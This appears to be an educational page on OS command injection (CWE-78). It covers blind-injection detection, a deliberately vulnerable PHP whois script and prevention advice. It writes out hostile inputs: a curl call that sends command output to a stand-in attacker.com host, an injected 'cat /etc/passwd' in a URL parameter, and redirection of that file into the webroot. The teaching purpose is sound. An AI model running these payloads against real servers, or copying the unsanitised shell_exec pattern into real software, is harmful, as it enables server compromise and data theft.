OS Command Injection (CWE-78)
Overview
Description
OS Command Injection is a vulnerability that allows an attacker to execute OS command on a vulnerable server.
This vulnerability occurs when Web application passes user input directly to the OS Shell. Almost all programming languages like C, Cpp, Java, Python, PHP, Perl allows calling OS Command. Users can execute any command with privileges give to webroot users.
Blind Command Injection :
Sometimes, the attacker cannot see the output in the webpage response, but the command is executed. To detect such Blind Command Injection attacker uses various techniques.
-
Time Delay
ping -c 10 127.0.0.1 &
If this command gets executed, the webpage will load after 10 seconds so that attacker can confirm the command injection.
-
Output Redirection
- An attacker can redirect the output of a command to the text file in the webroot directory. After the execution of the command, an attacker can read output from the website.
cat /etc/passwd > /var/www/default/html/temp.txt
- then attacker can read output at,
http://site.com/temp.txt
-
Sending output to Attacker Controlled Server
curl http://attacker.com/?op=$(whoami)
- This command will send an HTTP request to attacker.com with getting parameter
op=
output of the command. - If attackers don't have a website, he can use introspectable tunnels to localhost like ngrok, which will give temporary server
http://something.ngrok.io/
which redirects to localhost.
Example
Let's consider a simple web application that takes domain name
as input and display Whois record of it.
<?php
$domain = $_GET['domain'];
$output = shell_exec("whois $domain");
echo "<pre>$output</pre>";
?>
let's give domain as iitgoa.ac.in
, So at backend server, it will execute command as whois iitgoa.ac.in
which gives output as,
https://site.com/?domain=iitgoa.ac.in
...
Domain Name: iitgoa.ac.in
Registry Domain ID: D414400000001284698-IN
Registrar WHOIS Server:
Registrar URL: http://www.ernet.in
Updated Date: 2017-07-18T11:53:18Z
Creation Date: 2016-07-05T10:51:55Z
Registry Expiry Date: 2026-07-05T10:51:55Z
Registrar: ERNET India
Tech Email: Please contact the Registrar listed above
Name Server: dns1.iitgoa.ac.in
Name Server: dns2.iitgoa.ac.in
...
Now attacker can inject another command as,
https://site.com/?domain=iitgoa.ac.in%26cat /etc/passwd
In this %26
is URL encoding of &
,
So at backend server, it will execute the command as whois iitgoa.ac.in & cat /etc/passwd
And this will print whois information as well as passwd file.
- There are few command separators used to inject commands like,
&
,&&
,|
,||
,;
etc. - These are OS Specific.
- Generally, these separators are blacklisted, attacker has to bypass filters.
Impact
- The full System will get compromised.
- An attacker can access all the server data, which may contain sensitive data of business and customers.
- An attacker can use your server to make DDoS attacks on different servers.
- An attacker can create a backdoor so that he can connect to the server even after this vulnerability is patched.
Prevention
- Never trust user input, Avoid user input supplying to OS Shell.
- Filter user input based on a whitelist.
- Take only alphanumeric user input and Ignore if it contains any symbol or whitespace.
- b
Tools
- Commix: Automated All-in-One OS Command Injection and Exploitation Tool.